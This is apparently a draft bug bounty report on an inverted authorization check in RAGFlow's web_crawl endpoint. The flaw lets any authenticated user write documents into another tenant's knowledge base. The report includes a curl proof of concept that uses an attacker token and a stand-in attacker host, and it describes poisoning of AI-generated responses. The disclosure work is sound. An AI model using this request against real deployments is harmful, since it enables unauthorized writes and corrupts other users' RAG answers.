# Inverted Authorization Check in `web_crawl` Endpoint Allows Cross-Tenant Knowledge Base Write

## meta
platform: huntr
program: RAGFlow
asset: https://github.com/infiniflow/ragflow
date: 2026-02-12
status: DRAFT

````
Repository URL: https://github.com/infiniflow/ragflow
Package Manager: pip
Version Affected: 0.24.0
Vulnerability Type: Incorrect Authorization
CVSS:
  - Attack Vector: Network
  - Attack Complexity: Low
  - Privileges Required: Low
  - User Interaction: None
  - Scope: Unchanged
  - Confidentiality: None
  - Integrity: High
  - Availability: High
Title: Inverted authorization check in web_crawl allows cross-tenant knowledge base write
Description:

# Description

The `web_crawl` endpoint in `api/apps/document_app.py` contains an inverted authorization check at line 116. The correct pattern (used in the `upload` function at line 86) is:

    if not check_kb_team_permission(kb, current_user.id):
        return get_json_result(data=False, message="No authorization.", ...)

The `web_crawl` function is missing the `not` keyword:

    if check_kb_team_permission(kb, current_user.id):
        return get_json_result(data=False, message="No authorization.", ...)

Since `check_kb_team_permission()` returns `True` when the user IS authorized (owner or team member), this inverted logic:
- **Denies** authorized users (owner, team members)
- **Allows** unauthorized users (any other authenticated user)

After the check incorrectly passes, the function proceeds to crawl the attacker-supplied URL via `html2pdf()`, store the result in the victim's storage, insert a document record, and link it to the victim's tenant.
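
The effect of the missing `not` can be illustrated with a minimal, self-contained sketch. It does not use RAGFlow code: `KnowledgeBase`, `upload_guard`, and `web_crawl_guard` are hypothetical names introduced for illustration, and `check_kb_team_permission` here is a simplified stand-in that assumes only the behavior described above (it returns `True` for the owner or a team member).

```python
from dataclasses import dataclass, field


@dataclass
class KnowledgeBase:
    """Hypothetical stand-in for a knowledge base record (not the RAGFlow model)."""
    owner_id: str
    team_member_ids: set = field(default_factory=set)


def check_kb_team_permission(kb, user_id):
    """Simplified stand-in: True when the user is the owner or a team member."""
    return user_id == kb.owner_id or user_id in kb.team_member_ids


def upload_guard(kb, user_id):
    """Correct pattern: reject when the user is NOT authorized."""
    if not check_kb_team_permission(kb, user_id):
        return "No authorization."
    return "allowed"


def web_crawl_guard(kb, user_id):
    """Inverted pattern: the `not` is missing, so authorized users are rejected."""
    if check_kb_team_permission(kb, user_id):
        return "No authorization."
    return "allowed"


kb = KnowledgeBase(owner_id="victim", team_member_ids={"teammate"})

# Map each user to (result of correct guard, result of inverted guard).
results = {
    user: (upload_guard(kb, user), web_crawl_guard(kb, user))
    for user in ("victim", "teammate", "attacker")
}

for user, (upload_result, crawl_result) in results.items():
    print(f"{user}: upload={upload_result!r} web_crawl={crawl_result!r}")
```

Under these assumptions the two guards give opposite answers for every user: the owner and the teammate pass the correct guard and are rejected by the inverted one, while the outsider is rejected by the correct guard and passes the inverted one.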

# Proof of Concept

## Prerequisites
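- A RAGFlow instance with two user accounts (attacker and victim)
- The victim owns a knowledge base whose `kb_id` is known to the attacker
- Shell variables `ATTACKER_TOKEN`, `VICTIM_TOKEN`, and `VICTIM_KB_ID` set to the corresponding API tokens and knowledge base ID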

## Steps

```bash
# Attacker injects document into victim's knowledge base
curl -s -X POST "http://localhost/v1/document/web_crawl" \
  -H "Authorization: Bearer ${ATTACKER_TOKEN}" \
  -F "kb_id=${VICTIM_KB_ID}" \
  -F "name=injected_document" \
  -F "url=https://attacker.example.com/malicious-content.html"
# Returns: {"code": 0, "data": true}  (should be 401)

# Legitimate owner is BLOCKED from their own KB
curl -s -X POST "http://localhost/v1/document/web_crawl" \
  -H "Authorization: Bearer ${VICTIM_TOKEN}" \
  -F "kb_id=${VICTIM_KB_ID}" \
  -F "name=legitimate_document" \
  -F "url=https://example.com/content.html"
# Returns: {"code": 401, "data": false, "message": "No authorization."}  (should succeed)
```

Impact: Any authenticated user can inject documents into any other user's knowledge base, because the authorization check in web_crawl is inverted. Injected documents are indexed by the RAG pipeline, which enables poisoning of AI-generated responses. The same inverted check also blocks legitimate owners and team members from using web_crawl on their own knowledge bases.
Occurrences:
  - Permalink: https://github.com/infiniflow/ragflow/blob/bc9ed24a8503a0a5013341b63c428169c27ff280/api/apps/document_app.py#L116
    Description: Missing `not` keyword — `if check_kb_team_permission(kb, current_user.id):` denies authorized users and allows unauthorized users. Compare with correct pattern at line 86: `if not check_kb_team_permission(kb, current_user.id):`.
  - Permalink: https://github.com/infiniflow/ragflow/blob/bc9ed24a8503a0a5013341b63c428169c27ff280/api/common/check_team_permission.py#L25-L37
    Description: `check_kb_team_permission()` returns `True` for authorized users (owner or team member). The missing `not` at the call site inverts the logic.
References:
  - https://cwe.mitre.org/data/definitions/863.html — CWE-863: Incorrect Authorization
  - https://owasp.org/Top10/A01_2021-Broken_Access_Control/ — OWASP A01:2021
  - https://owasp.org/API-Security/editions/2023/en/0xa1-broken-object-level-authorization/ — OWASP API1:2023
````